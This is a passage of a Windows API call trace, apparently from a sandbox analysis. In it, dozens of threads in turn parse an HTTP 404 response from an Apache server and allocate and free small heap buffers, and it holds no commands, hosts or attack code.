[0210.331] GetProcessHeap () returned 0x690000 [0210.331] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 167 os_tid = 0x3d4 [0210.539] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.539] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.539] GetProcessHeap () returned 0x690000 [0210.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0210.539] GetProcessHeap () returned 0x690000 [0210.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0210.540] GetProcessHeap () returned 0x690000 [0210.540] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 168 os_tid = 0xc38 [0210.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.749] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.749] GetProcessHeap () returned 0x690000 [0210.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0210.749] GetProcessHeap () returned 0x690000 [0210.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0210.749] GetProcessHeap () returned 0x690000 [0210.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 169 os_tid = 0x1318 [0210.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0210.967] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.967] GetProcessHeap () returned 0x690000 [0210.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0210.967] GetProcessHeap () returned 0x690000 [0210.967] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0210.968] GetProcessHeap () returned 0x690000 [0210.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 170 os_tid = 0x6f4 [0211.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.184] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.184] GetProcessHeap () returned 0x690000 [0211.184] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0211.184] GetProcessHeap () returned 0x690000 [0211.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0211.184] GetProcessHeap () returned 0x690000 [0211.184] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 171 os_tid = 0xe28 [0211.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.369] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.369] GetProcessHeap () returned 0x690000 [0211.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0211.369] GetProcessHeap () returned 0x690000 [0211.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0211.369] GetProcessHeap () returned 0x690000 [0211.370] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 172 os_tid = 0xd94 [0211.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.541] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.541] GetProcessHeap () returned 0x690000 [0211.541] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0211.541] GetProcessHeap () returned 0x690000 [0211.541] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0211.541] GetProcessHeap () returned 0x690000 [0211.542] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 173 os_tid = 0x704 [0211.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.749] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.749] GetProcessHeap () returned 0x690000 [0211.749] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0211.749] GetProcessHeap () returned 0x690000 [0211.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0211.749] GetProcessHeap () returned 0x690000 [0211.749] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 174 os_tid = 0x6ec [0211.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0211.930] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0211.930] GetProcessHeap () returned 0x690000 [0211.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0211.930] GetProcessHeap () returned 0x690000 [0211.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0211.931] GetProcessHeap () returned 0x690000 [0211.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 175 os_tid = 0x860 [0212.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.262] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.262] GetProcessHeap () returned 0x690000 [0212.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0212.262] GetProcessHeap () returned 0x690000 [0212.262] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0212.262] GetProcessHeap () returned 0x690000 [0212.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 176 os_tid = 0x3b8 [0212.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.459] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.459] GetProcessHeap () returned 0x690000 [0212.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0212.459] GetProcessHeap () returned 0x690000 [0212.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0212.460] GetProcessHeap () returned 0x690000 [0212.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 177 os_tid = 0x710 [0212.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0212.804] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.804] GetProcessHeap () returned 0x690000 [0212.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0212.804] GetProcessHeap () returned 0x690000 [0212.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0212.804] GetProcessHeap () returned 0x690000 [0212.805] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 178 os_tid = 0x70c [0213.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.067] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.067] GetProcessHeap () returned 0x690000 [0213.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0213.067] GetProcessHeap () returned 0x690000 [0213.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0213.067] GetProcessHeap () returned 0x690000 [0213.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 179 os_tid = 0x6e0 [0213.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.287] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.287] GetProcessHeap () returned 0x690000 [0213.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0213.287] GetProcessHeap () returned 0x690000 [0213.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0213.287] GetProcessHeap () returned 0x690000 [0213.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 180 os_tid = 0x870 [0213.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.585] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.585] GetProcessHeap () returned 0x690000 [0213.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0213.585] GetProcessHeap () returned 0x690000 [0213.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0213.585] GetProcessHeap () returned 0x690000 [0213.585] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 181 os_tid = 0xf08 [0213.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0213.781] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.781] GetProcessHeap () returned 0x690000 [0213.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0213.781] GetProcessHeap () returned 0x690000 [0213.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0213.781] GetProcessHeap () returned 0x690000 [0213.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 182 os_tid = 0xdc0 [0214.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.014] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.014] GetProcessHeap () returned 0x690000 [0214.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0214.014] GetProcessHeap () returned 0x690000 [0214.014] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0214.014] GetProcessHeap () returned 0x690000 [0214.015] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 183 os_tid = 0xacc [0214.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.221] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.221] GetProcessHeap () returned 0x690000 [0214.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0214.221] GetProcessHeap () returned 0x690000 [0214.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0214.222] GetProcessHeap () returned 0x690000 [0214.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 184 os_tid = 0xcd0 [0214.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.434] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.434] GetProcessHeap () returned 0x690000 [0214.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0214.434] GetProcessHeap () returned 0x690000 [0214.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0214.434] GetProcessHeap () returned 0x690000 [0214.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 185 os_tid = 0x6d8 [0214.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.648] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.648] GetProcessHeap () returned 0x690000 [0214.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0214.648] GetProcessHeap () returned 0x690000 [0214.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0214.648] GetProcessHeap () returned 0x690000 [0214.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 186 os_tid = 0x18c [0214.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0214.851] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0214.851] GetProcessHeap () returned 0x690000 [0214.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0214.851] GetProcessHeap () returned 0x690000 [0214.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0214.851] GetProcessHeap () returned 0x690000 [0214.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 187 os_tid = 0x284 [0215.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.083] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.083] GetProcessHeap () returned 0x690000 [0215.083] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0215.083] GetProcessHeap () returned 0x690000 [0215.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0215.083] GetProcessHeap () returned 0x690000 [0215.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 188 os_tid = 0x7a4 [0215.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.271] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.271] GetProcessHeap () returned 0x690000 [0215.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0215.271] GetProcessHeap () returned 0x690000 [0215.271] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0215.271] GetProcessHeap () returned 0x690000 [0215.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 189 os_tid = 0x728 [0215.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.492] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.492] GetProcessHeap () returned 0x690000 [0215.492] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0215.492] GetProcessHeap () returned 0x690000 [0215.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0215.492] GetProcessHeap () returned 0x690000 [0215.492] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 190 os_tid = 0xf04 [0215.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.646] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.646] GetProcessHeap () returned 0x690000 [0215.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0215.646] GetProcessHeap () returned 0x690000 [0215.646] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0215.646] GetProcessHeap () returned 0x690000 [0215.647] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 191 os_tid = 0x9ac [0215.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0215.891] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.891] GetProcessHeap () returned 0x690000 [0215.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0215.891] GetProcessHeap () returned 0x690000 [0215.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0215.891] GetProcessHeap () returned 0x690000 [0215.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 192 os_tid = 0xea4 [0216.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.136] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.136] GetProcessHeap () returned 0x690000 [0216.136] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0216.136] GetProcessHeap () returned 0x690000 [0216.136] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0216.136] GetProcessHeap () returned 0x690000 [0216.137] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 193 os_tid = 0xb24 [0216.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.344] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.344] GetProcessHeap () returned 0x690000 [0216.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0216.344] GetProcessHeap () returned 0x690000 [0216.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0216.345] GetProcessHeap () returned 0x690000 [0216.345] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 194 os_tid = 0xc18 [0216.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.521] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.521] GetProcessHeap () returned 0x690000 [0216.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0216.521] GetProcessHeap () returned 0x690000 [0216.521] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0216.521] GetProcessHeap () returned 0x690000 [0216.522] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 195 os_tid = 0xbfc [0216.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.760] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:21 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0216.760] GetProcessHeap () returned 0x690000 [0216.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb68 [0216.760] GetProcessHeap () returned 0x690000 [0216.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0216.760] GetProcessHeap () returned 0x690000 [0216.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 196 os_tid = 0x98c [0217.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.006] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.006] GetProcessHeap () returned 0x690000 [0217.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0217.006] GetProcessHeap () returned 0x690000 [0217.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aead8 | out: hHeap=0x690000) returned 1 [0217.006] GetProcessHeap () returned 0x690000 [0217.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 Thread: id = 197 os_tid = 0xc14 [0217.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.256] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:44:22 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.256] GetProcessHeap () returned 0x690000 [0217.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aead8 [0217.256] GetProcessHeap () returned 0x690000 [0217.256] HeapFree (in: hHeap=0x690000, 